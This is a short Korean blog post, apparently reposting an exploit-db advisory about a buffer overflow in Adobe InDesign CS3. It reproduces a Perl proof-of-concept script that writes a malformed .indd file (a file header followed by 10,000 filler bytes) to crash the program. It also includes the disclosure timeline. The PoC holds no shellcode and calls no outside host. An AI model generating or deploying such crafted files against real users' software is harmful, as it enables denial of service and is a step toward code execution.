[Adobe]Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

어도브(Adobe)사의 제품 중 InDesign CS3 제품의 취약점이 발견되었다.

오늘 패치했는데 ㅡ.ㅡ;; 정말 패치한지 얼마 안됬는데!!

Adobe 정말 바쁘겠당 ㅎㅎ

벌써 POC까지 공개되었으니, 이것 또한 위험하다 ㅠ.ㅠ

원문 보기 : http://www.exploit-db.com/exploits/13817/

- Exploit Code

#!/usr/bin/perl

#

# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

#

# Vendor: Adobe Systems Inc.

#

# Product Web Page: http://www.adobe.com

#

# Version tested: CS3 10.0

#

# Summary: Adobe® InDesign® CS3 software provides precise control over

# typography and built-in creative tools for designing, preflighting,

# and publishing documents for print, online, or to mobile devices. Include

# interactivity, animation, video, and sound in page layouts to fully engage

# readers.

#

# Desc: When parsing .indd files to the application, it crashes instantly

# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and

# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution

# and denial of service.

#

#

# Tested on Microsoft Windows XP Professional SP3 (English)

#

#

#

# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

#

# liquidworm gmail com

#

# Zero Science Lab - http://www.zeroscience.mk

#

# 16.09.2009

#

#

#

# Vendor status:

#

# [16.09.2009] Vulnerability discovered.

# [09.03.2010] Vulnerability reported to vendor with sent PoC files.

# [21.03.2010] Asked confirmation from the vendor.

# [21.03.2010] Vendor asked for PoC files due to communication errors.

# [22.03.2010] Re-sent PoC files to vendor.

# [04.04.2010] Vendor confirms vulnerability.

# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.

# [04.06.2010] Public advisory released.

#

#

# Zero Science Lab Advisory ID: ZSL-2010-4941

# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php

#

#

#

# Raw PoC code:

#

$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01";

$fn = "teppei.indd";

$bof = "\x41" x 10000;

print "\n\n[*] Creating PoC file: $fn ...\r\n";

sleep(1);

open(indd, ">./$fn") || die "\n\aCannot open $fn : $!";

print indd "$header" . "$bof";

close (indd);

print "\n[*] PoC file successfully created!\r\n";